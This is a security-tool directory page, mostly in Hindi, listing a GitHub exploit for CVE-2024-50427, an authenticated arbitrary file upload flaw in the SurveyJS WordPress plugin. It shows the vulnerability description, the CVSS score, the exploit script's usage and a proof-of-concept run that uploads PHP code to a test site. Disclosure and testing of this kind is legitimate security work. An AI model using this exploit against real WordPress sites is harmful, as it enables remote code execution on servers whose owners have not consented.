Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-50427 — SurveyJS: ड्रैग एंड ड्रॉप वर्डप्रेस फ़ॉर्म बिल्डर <= 1.9.136 - प्रमाणित (सब्सक्राइबर+) मनमानी फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-50427
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubrandomrobbiebf/cve-2024-50427

CVE-2024-50427

SurveyJS: ड्रैग एंड ड्रॉप वर्डप्रेस फ़ॉर्म बिल्डर <= 1.9.136 - प्रमाणित (सब्सक्राइबर+) मनमानी फ़ाइल अपलोड

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-50427

SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - प्रमाणित (सब्सक्राइबर+) मनमाना फ़ाइल अपलोड

विवरण:

SurveyJS: किसी भी जटिलता के कई फॉर्म बनाने, स्टाइल करने और एम्बेड करने के लिए Drag & Drop WordPress Form Builder प्लगइन, WordPress के लिए, सभी संस्करणों में 1.9.136 तक और सहित, फ़ाइल प्रकार सत्यापन की कमी के कारण मनमाना फ़ाइल अपलोड के लिए कमजोर है। यह प्रमाणित हमलावरों के लिए, सब्सक्राइबर-स्तरीय पहुँच और उससे ऊपर, प्रभावित साइट के सर्वर पर मनमाना फ़ाइलें अपलोड करना संभव बनाता है जो रिमोट कोड निष्पादन संभव बना सकता है।

root@kitploit:~
Published: 2024-10-24 00:00:00
CVE: CVE-2024-50427
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: surveyjs

उपयोग कैसे करें

root@kitploit:~
usage: CVE-2024-50427.py [-h] [--code CODE] url username password

Upload a PHP file to a WordPress site.

positional arguments:
  url          The URL of the WordPress site (e.g., http://example.com)
  username     Your WordPress username
  password     Your WordPress password

options:
  -h, --help   show this help message and exit
  --code CODE  PHP code to execute

POC

root@kitploit:~
$ python3 CVE-2024-50427.py http://kubernetes.docker.internal [email protected] user --code "phpinfo();"
Login successful.
File uploaded successfully.
http://kubernetes.docker.internal/wp-content/uploads/surveyjs/158718452672e02bd1d7212.25114025.php
टूल डाउनलोड करें